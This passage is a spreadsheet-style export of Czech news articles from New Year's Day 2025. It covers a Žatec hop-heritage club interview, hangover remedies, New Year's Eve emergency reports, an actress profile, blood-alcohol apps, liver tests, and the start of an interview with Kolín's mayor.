své funkce vzdal a za svého nástupce navrhl právě tebe a tys funkci přijal. Bylo to tak? A pokud ano, tak kdy se to stalo? Přesně jak říkáš, je to asi sedm let. Ale Jirka je jenom jeden, takže si spíš nechávám říkat Tajný Beny. Co funkce Tajného rady obsahuje, není-li to tedy u takovéto funkce tajné? To je tak tajné, že to můžu pošeptat do ouška jenom Lojzovi Lupulínovi, který to nikde nevykecá. Ale v zásadě mi jde o to, abychom stále udržovali odkaz Homolupulů a měli nějaký směr. Když jsi zmínil nejstaršího pivaře na světě, nesmíme zapomenout také na Muzeum Homolupulů , ve kterém tě návštěvníci mohou potkat při komentovaných prohlídkách. Ano, muzeum je výkladní skříní Chmelobrany. Čtenářům, kteří u nás třeba ještě nebyli, můžeme prozradit, že Homo Lupulus namená člověk chmelový a tato kultura obývala Žatecko před několika tisíci lety. Návštěvníci bývají z příběhu Homolupulů nadšení a téměř vždy v sobě najdou jejich geny! Co má Chmelobrana před sebou a mohou se třeba přihlásit i noví členové? Po počátečních bouřlivých letech se činnost stabilizovala a hlavně se soustředíme na pořádání Chmelfestu, provoz Muzea Homolupulů a náš tradiční ples. I nadále chceme připomínat Žatečanům jedinečnost chmelařských tradic. Vizí je například oživení dalších chmelařských zákoutí. To nejde bez členů, kteří přinesou svůj zápal. Každého, kdo do toho chce jít s námi, přiložit ruku k dílu, ale taky si užít spoustu legrace, rádi uvítáme! Kolik má k dnešnímu dni Chmelobrana členů a hlásí se do spolku i noví a mladí adepti či adeptky? Členů máme okolo 80, z toho je 5 z tvé rodiny! Aktivních nás je přibližně 15. Vím o tobě, že máš rád degustace, a protože se v pivu vyznáš, tak si tyhle akce náležitě vychutnáváš. Spolu a s dalšími kamarády jsme absolvovali degustace ve výzkumáku a degustace v Chmelařském muzeu. Degustuješ i mimo Žatec ? No jasně, ta rozmanitost mě baví! Kam přijedu, tam hned strčím sosák pod pípu nejbližšího minipivovaru. Když mi někdo položí otázku, kolik je v Žatci pivovarů, tak mu odpovím, a pokud chce, tak mu je i vyjmenuji, a rád na závěr seznamu dodávám, že máme v Žatci ještě jeden domácí minipivovárek, ve kterém právě ty vaříš své pivo s názvem Rektor. Říkám to správně? Správně, Aleši – ostatně u sklenice Rektora jsme se kdysi seznámili! Jedná se o spodně kvašený ležák a vařím ho nepravidelně jednou za čas, když se cítím 100% připraven poskytnout mu maximální péči. Nesmíš nic podcenit, jinak to skončí špatně. Pojďme k tvému soukromí. Jsi ženatý a dětný. Říká se to tak, že jo? Když někdo děti nemá, tak je bezdětný, a když má, tak by měl být dětný, že jo? Představ nám tedy, prosím, svou manželku a vaše děti. Děkuji. Tvůj výraz dětný se mi líbí, je to o moc lepší, než kdybys mě označil třeba za fotříka. S manželkou Terezou, toho času učitelkou na gymplu, máme jedenáctiletou Barču, devítiletého Ondru a šestiletého Alberta. Nedávno jsme se synem Dominikem pokřtili knihu 777 autorů s názvem Žatecký román. A o tobě jsem se shodou okolností dozvěděl, že ses rozhodl navštívit všechny kopce v České republice , které jsou vysoké 777 m. Jak tě to napadlo? Podobně jako ty jsem načichlý sedmičkovou soustavou. Když jsem cestoval prstem po mapě a objevil jeden takový vrchol nedaleko Nového Města na Moravě , hned mě napadlo, jestli tam nejsou stopy po osídlení Homolupuly. Kolik kopců už máš za sebou a co jsi všechno objevil? Celkem jsem už objel 7 kopců z celkových 15. Víceméně všude se dají nějaké stopy osídlení nalézt – někde se dokonce dodnes chová dobytek. Umíš si představit guláš z hovězího, které vyrostlo na kótě 777 m? Sbíhají se mi sliny… Ale jaké máš, Martine, kromě piva a kola, ještě koníčky? Před dvěma roky mě Vláďa Valeš požádal, abych pomohl s výukou páťáků z Komeňáku v rámci tak zvaného projektového týdne Žatec – město chmele. Vrhlo mě to do historie chmelařství, která je krásná tím, jak odráží celosvětový vývoj v mnoha oborech. Není to jen zemědělství, ale hlavně lidé a třeba i ekonomika. Na přelomu 19. a 20. století se obchod s chmelem bouřlivě rozvíjel a investice do chmelařských skladů byly obrovské – s trochou nadsázky to můžeme přirovnat k dnešnímu boomu umělé inteligence. A vše máme v Žatci dokonale hmatatelné! Takže se bavím čtením starých knih, rozhovory s pamětníky apod. Vidím na tobě opravdové nadšení. Vznikají z tvého studia také nějaké výstupy? Jasně, rád se podělím o nabyté znalosti. Přes zimu probíhá v Žatci cyklus přednášek Chmelařské dědictví v jednom žoku, hlavním organizátorem je Petr Bažant. Loni jsem měl přednášku na téma síření chmele a letos se mají návštěvníci také na co těšit. Dostáváme se k tématům, která jsou mojí parketou. Co ty a literatura? Čteš? A co čteš? Čtu hlavně literaturu naučnou společenskovědní. A z beletrie jsem fanoušek kratších formátů, třeba od mistrů povídek Stroukala nebo Švandrlíka – mám rád jejich nadsázku. I ty lichotníku. Druhou mojí parketou je rocková hudba. Jakou muziku poslouchá Martin Beneš? Máš své oblíbené skupiny či interprety? Zkus dát sedmičku těch nejoblíbenějších, děkuji. Hudbu poslouchám podle nálady – co ve mně nevyvolá emoce, mě nezajímá. Takže když chci zapařit, pustím Horkýže Slíže nebo Tři sestry. Když potřebuju uronit slzu, sáhnu po Floydech a Oldfieldovi. Když chci povznést, postará se o to Vlasta Redl nebo Mňága. A když chci slyšet ženskou, bude to Belinda Carlisle . Martine, díky za rozhovor, a ať ti pivo nikdy nezhořkne, tedy právě naopak. Děkuji, Aleši , nápodobně a dáme si ještě jedno, ne? Napsal(a): Aleš Stroukal Autor: Aleš Stroukal Autor person Aleš Stroukal Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>20250101_216_3695259011_d903c508149749cd1f51.html</t>
  </si>
  <si>
    <t>d903c508149749cd1f51</t>
  </si>
  <si>
    <t>Jak na kocovinu po silvestru? Domácí vyprošťovák je česnek, pomáhá i zmrzlina</t>
  </si>
  <si>
    <t>Jak na kocovinu po silvestru? Domácí vyprošťovák je česnek, pomáhá i zmrzlina Jedno z nejrychleji vyprchaných novoročních předsevzetí bývá to, které si často říká člověk ráno po bujaré silvestrovské oslavě. Tedy, že už nikdy nebude pít. Pokud však do nového roku vstoupí s kocovinou, může se kromě hadru na hlavu a prášku proti bolesti uchýlit také k různým vyprošťovákům. Žádný z nich sice není zaručený, každý si ale dokáže najít ten svůj. S jejich výběrem pomohl Deníku nejen pohled do českých tradic, ale i známý gurmet Pavel Maurer či historik gastronomie Martin Franc, známý jako Docent Jídlo. Svou troškou do mlýna přispěla i umělá inteligence v podání chatbota ChatGPT. Domácí všelék? Česnek Například jeden středočeský recept praví: „Zahřejeme mléko na teplotu, ve které naposledy udržíme prst. Přidáme utřený česnek (jeden stroužek na hrnek mléka), osolíme a přidáme lžičku medu. Vše na mírném ohni propojíme. Poté necháme vychladnout – konzumujeme ideálně následující den. Dva dny starý chléb (nikoli čerstvý!) pokapeme olivovým olejem. Chléb namáčíme v mléce a za stálého vzdychání konzumujeme na lačno.“ Gurmet Pavel Maurer pak kromě již tradiční vydatné česnečky nabízí i netradiční pojetí novoročního těžkého vstávání. „Někomu třeba pomůže pivo , ale třeba ve Španělsku se prodává speciální krabice s názvem Ranní polévka s různými vývary,“ řekl gurmet. Návod z Japonska Ve Španělsku mají i další zajímavou tradici, která by podle Maurera mohla pomoct ranní kocovině předejít. A tou je pojídání kuliček hroznového vína . „Než tu odbije půlnoc, dají si Španělé s každou vteřinou před ní právě tyto kuličky, které se prodávají po dvanácti kusech v kornoutu. Zkoušel jsem to, a každou vteřinu sníst jeden hrozen je docela rychlé. Myslím, že když jsou lidé už trochu unavení a snědí tolik hroznového vína , může to být začátek vyprošťováku,“ míní Maurer . Prozradil i návod z Japonska . „Naučila mě to jedna moje japonská kamarádka. Jsou to švestičky umeboshi, tedy nakládané japonské švestky na slano. Ty se dají koupit i v Česku a ráno je to vynikající vyprošťovák,“ doplnil Maurer . Na kocovinu zmrzlina Historik gastronomie Martin Franc podle svých slov nedá při ranní alkoholové nevolnosti dopustit na zmrzlinový pohár s jemnou vanilkovou zmrzlinou. Při pohledu do historických análů pak připomněl kuchařku Péťa Vařič aneb Snadné etudy pro hrnec s pokličkou a obě ruce levé z dílny tvůrce Toulek Českou minulostí Petra Hory-Hořejše, která vyšla na konci sedmdesátých let minulého století. „Pamatuji si, že mě už jako dítě zaujal vyprošťovací recept, který doporučoval smíchat silnou černou kávu s citrónovou šťávou,“ uvedl Franc. Doplnil, že s takzvanými vyprošťováky přispěl do české gastronomie i legendární československý kuchař a autor několika kuchařek Vilém Vrabec . „Myslím, že v jednom silvestrovském čísle časopisu Květy radil konzumovat do ovocna laděné koktejly. Vitamín C totiž pomáhá eliminovat nadbytečný alkohol ,“ doplnil Franc. Co radí umělá inteligence? Ta nabídla hned čtyři recepty 1. Silný vývar (např. kuřecí nebo hovězí) Vývar obsahuje elektrolyty (sodík, draslík) a kolagen, které hydratují a pomáhají regeneraci. Teplo také zklidní žaludek. Recept: Povařte kuřecí/hovězí maso s kostmi, mrkví, celerem, cibulí, česnekem a solí. Můžete přidat trochu zázvoru pro povzbuzení metabolismu. Sceďte a podávejte s čerstvou petrželkou. 2. Kyselá zelňačka nebo jiné fermentované potraviny Kyselé zelí obsahuje probiotika, která podporují trávení, a vitamín C, který pomáhá tělu zbavit se toxinů. Recept: Na tuku osmahněte cibuli, přidejte nakrájené kysané zelí, brambory, uzené maso a papriku. Zalijte vývarem a vařte. Podávejte s chlebem. 3. Domácí rehydratační nápoj Po alkoholu tělo potřebuje rychle doplnit tekutiny a elektrolyty. Tento nápoj je jednoduchý a účinný. Recept: Smíchejte 500 ml vody, šťávu z jednoho citronu, lžíci medu a špetku soli. Pro extra energii můžete přidat trochu čerstvého zázvoru nebo pomerančového džusu. 4. Banánový smoothie Banány obsahují draslík, který z těla vyplavuje alkohol , mléčné produkty zklidní žaludek. Recept:</t>
  </si>
  <si>
    <t>20250101_217_3695259814_0abf836bc7a7ca8bbaea.html</t>
  </si>
  <si>
    <t>0abf836bc7a7ca8bbaea</t>
  </si>
  <si>
    <t>Záchranáři řešili na silvestra popáleniny, úrazy i napadení</t>
  </si>
  <si>
    <t>Záchranáři řešili na silvestra popáleniny, úrazy i napadení Stanoviště záchranářů na Staroměstském náměstí v Praze Mnoho výjezdů kvůli silvestrovským oslavám evidují hasiči a také záchranáři. Jen v Praze zasahovali u stovky událostí, v devíti případech šlo o zranění způsobená zábavní pyrotechnikou. Záchranáři po celé republice řešili také otravy alkoholem nebo napadení. Hasiči vyjížděli i k požárům keřů či odpadkových košů. Během silvestrovské noci policisté nezaznamenali žádnou mimořádnou událost, řešili ale víc konfliktních případů než v běžný den. Pražští záchranáři vyjeli k 348 případům, s oslavami příchodu nového roku souvisela stovka. Zranění zábavní pyrotechnikou bylo devět, řekl jejich mluvčí Karel Kirs. „Ve speciálu Golem bylo ošetřeno celkem 27 pacientů, z nichž třináct bylo transportováno do zdravotnického zařízení. Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra,“ informoval mluvčí na sociální síti X. Na průběh oslav v hlavním městě dohlíželi přímo z lodi na Vltavě i vodní záchranáři. Ve středních Čechách silvestrovské oslavy poznamenaly častější úrazy od zábavní pyrotechniky. Záchranáři zasahovali u šesti zraněných a čtyř popálených, což je více než loni. Proti loňskému silvestru výrazně přibylo i pacientů, které zmohl alkohol . Zatímco policisté a hasiči v Libereckém kraji hodnotí silvestrovské oslavy jako poměrně klidné, záchranáři zažili perný přelom roku. Na silvestra až do středečního rána se nezastavili, řešili přes 260 událostí, což je zhruba o stovku víc než běžně. O půlnoci jim na dispečinku svítilo číslo 199, to dlouho nikdo nepamatuje, a do rána bylo dalších 65 událostí, řekl krátce po 06:00 mluvčí Zdravotnické záchranné služby Libereckého kraje Michael Georgiev. „Ošetřili jsme sedm lidí, kteří se zranili při odpalování pyrotechniky, ale také desítky zranění a intoxikací alkoholem , desítky napadení. Záchranáři říkali, že tolik napadení a agrese nepamatují, naštěstí jsme nezaznamenali napadení zdravotníků. Ale většina těch událostí byla spjata s alkoholem ,“ řekl Georgiev. Pokud jde o úrazy pyrotechnikou, i když jich bylo víc než v posledních letech, šlo podle něj naštěstí o lehká zranění. Požár domu i kotelny V Pardubickém kraji o silvestrovské půlnoci hořel byt v panelovém domě ve Svitavách. Jednoho člověka záchranáři odvezli s lehčím zraněním na chirurgii místní nemocnice. Evakuace domu nebyla nutná, informovala mluvčí zdravotnických záchranářů Alena Kisiala. Podle ní to byl nejvážnější případ na silvestra a v prvních hodinách nového roku. Jihomoravští hasiči zasahovali v noci na středu u požáru dvou rodinných domů na Vyškovsku, v Heršpicích a Studnicích, a jednoho ve Svatobořicích-Mistříně na Hodonínsku. Ve Studnicích převzali dva lidi do péče záchranáři. V jednom případě také hořelo dříví v kotelně kláštera dominikánek ve Střelicích na Brněnsku, který slouží jako domov pro zdravotně postižené. Z objektu se muselo evakuovat 55 lidí, ale po ukončení zásahu se mohli vrátit a nikdo se nezranil. Škoda činila 250 tisíc korun. V Moravskoslezském kraji se zranilo během silvestrovské noci při odpalování pyrotechniky osm lidí. Záchranáři v regionu měli taky za sebou rušnou noc. „Nárůst počtu zásahů byl více než dvojnásobný oproti běžným nocím, uvedl jejich mluvčí Lukáš Humpl. Rvačky, výtržnosti i rušení nočního klidu Pyrotechnika v Ústeckém kraji způsobila několik amputací, ať už ruky nebo článků prstů. Záchranáři vyjížděli k desítkám případů. Zranění zábavní pyrotechnikou si vyžádalo jejich zásah desetkrát, další události se týkaly výjezdů k lidem, kteří požili přemíru alkoholu nebo se v důsledku jeho požití poranili. Oslavy v Královéhradeckém kraji provázela fyzická napadení, rvačky, výtržnosti, rušení nočního klidu a drobné požáry. Většinu z nich způsobili opilci. Policie v kraji od úterních 18:00 do středečních 06:00 přijala okolo 190 oznámení, což bylo dle mluvčí Karolíny Macháčkové na úrovni loňského roku. Zdravotničtí záchranáři řešili tři drobné popáleniny od zábavní pyrotechniky. Na Vysočině byly silvestrovské a novoroční oslavy podle hasičů klidné. Bez větších požárů se obešly i v Olomouckém kraji. Ve Zlínském kraji byly oslavy pro policii o něco rušnější než loňské. Obešly se však bez mimořádných událostí. Od úterních 18:00 do středečních 06:00 přijalo operační středisko krajského ředitelství policie téměř 140 oznámení, loni jich bylo o čtyři desítky méně. Více konfliktů než v běžný den Policie během silvestrovské noci vyjížděla k mnohem více konfliktním situacím než v běžný den, informovala na sociální síti X. Bylo mezi nimi třeba napadání a domácí násilí. Případů, kterými se zabývala, bylo podobné množství jako v běžný pracovní den. Celorepublikově policisté řešili celkem 3250 případů. „Což je přibližně stejně jako v běžný pracovní den,“ doplnila policie na síti X. Na silvestra uvedla, že na bezpečnost při oslavách příchodu nového roku dohlédnou tisíce policistů, kteří se zaměří na frekventovaná místa i takzvané měkké cíle, což jsou například obchodní centra, letiště, nádraží a další prostory s velkou koncentrací lidí a nízkou úrovní zabezpečení. V ulicích byly třeba v Praze o silvestrovské noci také hlídky s dlouhými zbraněmi. Policie nicméně ještě před začátkem novoročních oslav uvedla, že pro území České republiky nemá informace o konkrétní hrozbě.</t>
  </si>
  <si>
    <t>20250101_218_3695257104_12c51c56cc4ddd998970.html</t>
  </si>
  <si>
    <t>12c51c56cc4ddd998970</t>
  </si>
  <si>
    <t>Je kopií hollywoodské hvězdy. Natočila jen dvě pohádky a zmizela na Slovensku. Napadne vás, o koho jde?</t>
  </si>
  <si>
    <t>Je kopií hollywoodské hvězdy. Natočila jen dvě pohádky a zmizela na Slovensku . Napadne vás, o koho jde? info 4 fotografie Někteří herci zazáří jen v několika filmech a pak se vydají zcela jinou cestou. Přesně to se stalo krásné herečce Márii Podhradské, která natočila jen dvě pohádky a zmizela. Jak se jí daří dnes? Pohádky Boženy Němcové bývají oblíbeným námětem řady filmařů. V roce 1993 z nich čerpal i režisér Ludvík Ráža , který natočil pohádku Sedmero krkavců. Hlavní roli dívky Bohdanky, která podstoupila ty nejtěžší zkoušky, aby vysvobodila svých sedm bratrů, ztvárnila herečka Mária Podhradská . O dva roky později si stejný režisér vybral Máriu do hlavní role své další pohádky Sen o krásné panně. Kam po té zmizela? Hudební rodina V Sedmero krkavcích se Mária objevila jako osmnáctiletá a v příštím roce již oslaví abrahámoviny. Jelikož pochází z hudebního prostředí, které ji velmi formovalo, bylo celkem jasné, kudy se povine její profesní dráha. Přitom na začátku to vypadalo, že půjde ve stopách své slavnější kolegyně. Dvojnice Vivien Leigh Psal se rok 1991 a v tehdejším Československu probíhala soutěž o dvojnici herečky Vivien Leigh v roli Scarlett z filmu Jih proti Severu. Tehdy ji vyhrála šestnáctiletá studentka Střední pedagogické školy v Bratislavě . Ano tušíte správně, Mária Podhradská , která porotu tehdy okouzlila svým půvabem, šarmem a skromným vystupováním. Právě tahle soutěž způsobila, že se Mária objevila ve zmíněných pohádkách. Zaujala totiž režiséra Ludvíka Rážu , který ji obsadil rovnou do hlavních rolí a po boku takových hvězd, jako byla Jana Hlaváčová , Radoslav Brzobohatý nebo Boris Rösner . Zpěv je zpěv Zpívalo se u nich doma a tak není divu, že hudebně nadaná Mária si začala hledat vlastní cesty k hudebnímu vyjádření. Ještě během středoškolských studií založila s bratry Kachútovci známou gospelovou skupinu Atlanta a nahrála s nimi čtyři alba. Právě díky tomuto typu hudby si vysloužila titul První dáma slovenského gospelu. Na vysoké škole sice vystudovala angličtinu a španělštinu, ale dál se věnovala hudbě. Kromě hudebních alb, která nahrála s Atlantou , vydala i svá sólová. Rodina dostala přednost V určitém období ustoupila ze slibně rozjeté hudební kariéry, jelikož přednost dostaly děti, rodina a dětské projekty, které začala produkovat s muzikantem Richardem Čanakym. Říkají si Spievankovo a pořádají různé koncerty pro děti, vystupují na dětských akcích. Nahráli i řadu dětských alb, kde se kromě hudby věnují i pohádkám nebo angličtině, kterou se těm nejmenším snaží zprostředkovat hravou formou. Matka tří Mária je hrdou maminkou tří dětí, Katky, Terezky a syna Maťka. Je na ně nesmírně hrdá a velmi je miluje. Se všemi má velmi krásný vztah a ví, že se na ně může spolehnout a oni na ni. Ostatně, vzájemnou podporu prověřilo i onkologické onemocnění Máriina manžela. Pro magazín Najmama k tomu řekla: „Šla jsem i za knězem, se kterým máme velmi blízký vztah, a který má sám rakovinu... no a rodina a přátelé jsou v tomto velmi důležití a také chodím na psychoterapii. To bych doporučovala každému, neboť opravdu, člověk se najde, je to skvělá věc a zkvalitní to život velmi. Tyto věci nás drží a paradoxně, je nám dobře... Chci všem říct, že i takové období se dá přežít hezky, a že se toho nemusíme bát.“ Nutno dodat, že i přes prožité peripetie, které skončily dobře, Mária vypadá stále nádherně a sotva byste jí hádali její věk. Na ni sedí ono okřídlené, že nestárne, ale zraje jako víno .</t>
  </si>
  <si>
    <t>233510</t>
  </si>
  <si>
    <t>20250101_219_3695256677_96b82f353ee9170eefac.html</t>
  </si>
  <si>
    <t>96b82f353ee9170eefac</t>
  </si>
  <si>
    <t>Nejlepší aplikace na měření alkoholu v&amp;nbsp;krvi! Zůstaňte o&amp;nbsp;svátcích v&amp;nbsp;klidu</t>
  </si>
  <si>
    <t>Nejlepší aplikace na měření alkoholu v&amp;nbsp;krvi! Zůstaňte o&amp;nbsp;svátcích v&amp;nbsp;klidu &amp;lt; &amp;gt; Oslavy startu nového roku si mnoho z nás neumí představit bez sklenky punče nebo svařeného vína . Pokud chcete mít jistotu, že při cestě od známých či přátel zpět domů neohrozíte sebe ani ostatní, můžete si vyzkoušet i moderní technologie. Aplikace na měření alkoholu v krvi vám zhruba napoví, kdy už je čas zůstat u vody nebo zavolat taxi. Aplikace však nejsou stoprocentní a tak se nedoporučuje brát je zcela vážně. Vánoční alkohol -rádce s názvem Alkohol Kalkulačka Tato aplikace je ideální pro rychlé výpočty, kolik alkoholu máte právě v krvi. Stačí zadat množství a typ nápoje, svou hmotnost a další údaje. Za okamžik získáte orientační hodnotu, která vás udrží v obraze. Perfektní, pokud si chcete dát šampaňské při sledování vánoční klasiky například s názvem Sám Doma! Fotogalerie Alkohol _app IMG_1308 IMG_1309 IMG_1310 Vstoupit do galerie Aplikace ke stažení zde Pro detailní sledování funguje také Alkoholmetr.cz Pokud se vaše sváteční večírky obvykle protáhnou, Alkoholmetr je přesně to, co potřebujete. Tato webová stránka vám umožní sledovat i dlouhodobou konzumaci alkoholu , takže zhruba víte, kdy můžete bezpečně řídit. Užitečné, když chcete stihnout filmový maraton u přátel bez obav. Nejprve si zvolíte své pohlaví, zadáte svou hmotnost a nastavíte časový interval, během kterého jste konzumovali alkohol . V dalším kroku pak jednoduše vyberete druhy a množství vypitých nápojů. Platforma nabízí rozsáhlý seznam nejrůznějších alkoholických nápojů, což výrazně usnadňuje zadávání dat. Po dokončení výpočtu se zobrazí přehledný graf, který vám ukáže aktuální hladinu alkoholu v krvi, odhadovaný čas do vystřízlivění a moment, kdy budete „fit“ pro řízení. Web je plně optimalizovaný pro všechna zařízení, takže funguje bez problémů i na mobilu. Fotogalerie #2 Alkoholmetr.cz Alkoholmetr.cz1 Alkoholmetr.cz2 Vstoupit do galerie Webová stránka Spojte bezpečnost a sváteční pohodu také s Bezpečnou cestou Tato webová stránka vám nejen pomůže odhadnout hladinu alkoholu , ale také vám rovnou nabídne alternativní dopravu, pokud nemůžete řídit. Taxi nebo veřejná doprava jsou díky této aplikaci jen pár kliknutí daleko. Ideální, pokud jste se na Vánočním flámu nechali unést více, než jste plánovali. Aplikace funguje na velice podobné bázi jako předchozí Alkoholmetr. Fotogalerie #3 Bezpecnecesty Bezpecnecesty1 Bezpecnecesty2 Vstoupit do galerie Webová stránka Vánoce mají být o radosti, lásce a pohodě, nikoliv o starostech. Díky moderním aplikacím můžete mít pod kontrolou i takovou věc, jakou je alkohol . Dávejte si však pozor, na chytré technologie se v tomto ohledu nedá 100% spoléhat a před jízdou raději alkohol vůbec nekonzumujte. Tak si užijte krásné svátky bez zbytečných komplikací.</t>
  </si>
  <si>
    <t>369</t>
  </si>
  <si>
    <t>20250101_22_3698082420_e1478fbf1b9cd21c0120.html</t>
  </si>
  <si>
    <t>e1478fbf1b9cd21c0120</t>
  </si>
  <si>
    <t>Jaterní testy: klíč k diagnostice a prevenci nemocí jater</t>
  </si>
  <si>
    <t>Jaterní testy: klíč k diagnostice a prevenci nemocí jater VIDEO Publikuje: Nikola Macáková — 01. 01. 2025 Zdroj: Nikola Macáková - redakční text Odběr krve, ilustrační foto. Zdroj: rawpixel ze služby freepik Úvodní stránka » Jaterní testy: klíč k diagnostice a prevenci nemocí jater Jaterní testy jsou základním laboratorním vyšetřením, které pomáhá odhalit poškození jater a monitorovat efektivitu léčby. Co jsou jaterní testy a proč jsou důležité? Jaterní testy patří mezi základní diagnostické nástroje moderní medicíny, které pomáhají lékařům odhalit poruchy jaterní funkce a morfologie. Slouží k měření hladin enzymů a dalších látek v krvi, jako jsou alaninaminotransferáza (ALT), aspartátaminotransferáza (AST), gama-glutamyltransferáza (GGT) nebo bilirubin. Podle medicínského portálu České nemoci jaterní testy mohou odhalit nejen závažné záněty a poškození, ale také monitorovat účinnost probíhající léčby. Důležitost těchto testů spočívá v jejich schopnosti identifikovat abnormality, které mohou signalizovat závažná onemocnění, jako je hepatitida, cirhóza nebo toxické poškození alkoholem . Nicméně samy o sobě nejsou postačující k určení přesné diagnózy, jak uvádí Společnost všeobecného lékařství kombinace laboratorních testů a dalších klinických metod je klíčová pro stanovení přesné diagnózy a efektivní léčby. „ Jaterní testy jsou laboratorním vyšetřením, které nás informuje o stavu jater. Jedná se o odběr venózní krve a následné stanovení plazmatické resp. sérové koncentrace 4 enzymů a bilirubinu. Celkem se tedy jedná o 5 parametrů (viz tabulka níže),“ uvádí k tématu Wikiskripta. Parametr Koncentrace u mužů Koncentrace u žen Alaninaminotransferáza (ALT) 0,10–0,80 µkat/l 0,10–0,60 µkat/l Aspartátaminotransferáza (AST) 0,10–0,85 µkat/l 0,10–0,60 µkat/l Gamaglutamyltransferáza (GGT, GMT) 0,10–0,85 µkat/l 0,10–0,70 µkat/l Alkalická fosfatáza (ALP, AF) 0,10–2,20 µkat/l 0,10–2,20 µkat/l Celkový bilirubin (bili, BILT) 2,0–17,0 µmol/l 2,0–17,0 µmol/l „ Zvýšená aktivita alaninaminotransferázy ( ALT ) a aspartátaminotransferázy ( AST ) signalizuje poškození cytoplazmatické membrány hepatocytů. Zvýšená aktivita gammaglutamyltransfertázy ( GGT ) a alkalické fosfatázy ( ALP ) signalizuje poruchu odtoku žluči z jater, “ doplňují v krátké citaci Wikiskripta. Jak probíhá vyšetření a co ukazují hodnoty Samotné provedení jaterních testů zahrnuje odběr krve, který se obvykle provádí nalačno. Vyhodnocování jednotlivých parametrů pak poskytuje informaci o funkčním i strukturálním stavu jater. Zvýšené hodnoty ALT a AST mohou signalizovat zánět nebo akutní poškození jater, zatímco abnormální hladiny GGT či bilirubinu mohou naznačovat problémy spojené s odtokem s odtokem u017luči nebo toxické poškození. Průběžné hodnocení je důležité i pro pacienty s chronickými onemocněními, u nichž lékaři sledují progresi nemoci a reakci na léčbu. Podle odborného lékařského portálu svl.cz pravidelné kontroly mohou odhalit i skryté abnormality, které nejsou klinicky patrné, a předejít tak závažným komplikacím. Nejčastější příčiny abnormalit v jaterních testech Abnormální výsledky jaterních testů mohou mít celou řadu příčin, které se liší v závažnosti i povaze. Mezi nejčastější příčiny patří infekční hepatitidy (zejména typu A, B a C), alkoholické a nealkoholické poškození jater, ale také autoimunitní onemocnění nebo metabolické poruchy, jako je steatóza. Společnost všeobecného lékařství k tomu dodává: „ Nejčastějšími spouštěči abnormalit v jaterních testech jsou metabolické poruchy a toxické vlivy, jako je dlouhodobá konzumace alkoholu nebo nadměrné užívání léků.“ Pro lékaře je obecně důležité rozpoznat primární příčinu abnormalit a určit, zda se jedná o akutní stav, který vyžaduje okamžitou intervenci, nebo o chronický problém, jehož řešení zahrnuje dlouhodobé sledování a léčbu. Prevence a význam pravidelných kontrol Důležitou součástí péče o zdraví jater je prevence. Rizikové faktory, jako je nadměrná konzumace alkoholu , obezita, nezdravá strava a nedostatek pohybu, mohou být účinně eliminovány změnou životního stylu. Pravidelné kontroly jaterních funkcí jsou nezbytné pro osoby s rizikovými faktory, jako jsou pacienti s virovými hepatitidami nebo metabolickými poruchami. Podle zdravotnického portálu České nemoci včasné zásahy na základě pravidelných testů mohou zabránit progresi onemocnění a zlepšit prognózu pacientů. Video/Zdroj: YouTube.com/ Decoiled by Coiled (v původním znění) Dále použity redakční informace a zdroje – redakční text * Související články Autor: Nikola Macáková Autor person Nikola Macáková Rubrika transition_slide Z medicíny</t>
  </si>
  <si>
    <t>20250101_220_3695268900_a35a89760af67ddda626.html</t>
  </si>
  <si>
    <t>a35a89760af67ddda626</t>
  </si>
  <si>
    <t>Rozhovor se starostou Kolína Michaelem Kašparem: Východní obchvat není sci-fi</t>
  </si>
  <si>
    <t>Rozhovor se starostou Kolína Michaelem Kašparem: Východní obchvat není sci-fi Jak byste z pohledu kolínského starosty rok 2024 zhodnotil? Já myslím, že dobře. Samozřejmě těch věcí, co se v Kolíně udály, je hodně. Udělalo se mnoho oprav ve školách, ve školkách, už se pracuje na Komenského parku. Církev dodělala druhou fázi Bartoloměje. Podařilo se nám vykoupit baštu Hankovec. A také opravy ulic si myslím, že byly výrazné. Vzniklo nám tady na Labi nové molo, takže já to hodnotím docela pozitivně. Samozřejmě to přináší i nějaká omezení. Dělají se cyklostezky, jsou rozkopané chodníky na Benešově a Masarykově, což je krátkodobé omezení, ale ve výsledku si myslím, že to bude opravdu hezké. Zároveň i to musím hodnotit pozitivně, že se nám podařilo už dostat dluh pod 100 milionů z 1,1 miliardy, takže už je velká část splacená a ta zátěž rozpočtu je výrazně menší, než byla třeba před několika lety. Jaké věci či investice vás nejvíce potěšily a jaké naopak zklamaly či zůstaly za očekáváním? Těší mě, že se povedlo zrealizovat nové cyklostezky v ulicích Benešova a Masarykova a že se nám v tomto případě podařilo získat z těch 35 milionů asi 27 dotačních. To samé Komenského park, kde jsme asi 29 milionů získali z dotace. Také mám opravdu radost z toho, že se nám konečně po těch letech podařilo dotáhnout baštu Hankovec, což nebylo jednoduché a oprava bude následovat. Potěšilo mě také podepsání smlouvy se Středočeským krajem , že bude parkovací dům zařazen do P+R systému kraje a Středočeský kraj se zavázal k tomu, že stavbu zafinancuje. Také je samozřejmě super, že se podařilo prosadit a už se staví podchod a bezbariérové napojení všech nástupišť na nádraží. To je obrovská investice, která naši vlakovou stanici velmi zmodernizuje. Na druhou stranu člověk není rád, když se něco nepovede podle jeho představ. Jako třeba v případě veřejného prostoru Husova a zahrady za Městskou knihovnou. My jsme firmě vypověděli smlouvu, pak to dlouhou dobu leželo ladem, protože jsme museli dělat znalecký posudek. Ale teď už máme vysoutěženo a měla by se podepisovat smlouva. Takže někdy v březnu by se mělo začít pracovat. Doufám, že to bude konečně dotažené. A ještě jedna věc mě napadá. Za sebe jsem rád, že rekonstrukce Třídvorské ulice probíhá, ale chápu, že jde o výrazné omezení. Zdržení stávající etapy je nepříjemné, ale stav mostů je výrazně horší než se čekalo. Musíme to vydržet, zase to pak bude vypadat o dost lépe, navíc, když prodloužíme stávající cyklostezku vedoucí na Tři Dvory. Kolínsko V prosinci zastupitelstvo schválilo rozpočet pro rok 2025. Pojďme jej stručně rozebrat a říci, na jaké hlavní investice se mohou Kolíňáci příští rok těšit. Prvně je potřeba říct, že kdyby se někdo chtěl podívat do detailu, tak je rozpočet na webu . Asi 146 milionů by mělo jít do různých silnic. Měla by začít například rekonstrukce ulice Kutnohorská od Futura směrem k divadlu. Pokračuje velká rekonstrukce Radimského a Kremličkova na sídlišti u Vodárny. Plus tam je dalších několik komunikací. Z těch velkých investic by měla proběhnout právě ta Husova. Dodělá se Komenského park, dodělají se cyklostezky, o kterých jsem mluvil, Masarykova a Benešova 